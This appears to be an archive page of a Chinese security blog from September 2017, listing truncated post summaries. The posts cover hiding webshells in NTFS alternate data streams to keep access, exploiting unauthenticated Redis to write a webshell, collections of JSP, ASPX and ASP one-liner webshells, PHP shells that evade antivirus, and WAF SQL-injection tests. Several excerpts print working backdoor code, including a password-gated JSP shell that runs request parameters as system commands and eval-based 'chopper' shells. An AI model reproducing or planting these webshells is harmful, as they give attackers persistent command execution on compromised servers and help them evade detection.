09 2017 档案
摘要:0X01 前言 未知攻,焉知防,在web端如何做手脚维护自己拿到的权限呢?首先要面临的是webshell查杀,那么通过利用ADS隐藏webshell,不失为一个好办法。 0X02 利用ADS隐藏webshell 关于ADS的介绍,就不再阐述,详见尾部参考资料。 PHP 一句话木马:<?php @ev
阅读全文
摘要:0x01 环境搭建 启动redis服务进程后,就可以使用测试客户端程序redis-cli和redis服务交互了。 比如: 0x02 未授权访问漏洞测试 使用redis客户端直接无账号成功登录redis: 从登录的结果可以看出该redis服务对公网开放,且未启用认证。 利用redis写webshell
阅读全文
摘要:JSP一句话收集: 1、带密码的回显cmd马 <% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i"))
阅读全文
摘要:aspx木马收集: <%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%> 随日期变化的连接密码, Asp.NET服务端写法: <%@ Page Language="Jscript"%><%eval(Reque
阅读全文
摘要:ASP一句话木马收集: <%eval request("chopper")%> <%execute request("chopper")%> <%execute(request("chopper"))%> <%ExecuteGlobal request("chopper")%> <%Eval(Req
阅读全文
摘要:珍藏版: 一个简单的过D盾的免杀php 过狗过D盾 参考链接:https://www.t00ls.net/thread-49715-1-1.html
阅读全文
摘要:代码审计精华文章收录: 关于php的一些'特性'或漏洞 https://github.com/80vul/phpcodz 【干货分享】PHP漏洞挖掘——进阶篇 http://blog.nsfocus.net/php-vulnerability-mining/ 常见高危漏洞及验证方法 http://b
阅读全文
摘要:0X01 前言 D盾_IIS防火墙,目前只支持Win2003服务器,前阵子看见官方博客说D盾新版将近期推出,相信功能会更强大,这边分享一下之前的SQL注入防御的测试情况。D盾_IIS防火墙注入防御策略,如下图,主要防御GET/POST/COOKIE,文件允许白名单设置。构造不同的测试环境,IIS+(
阅读全文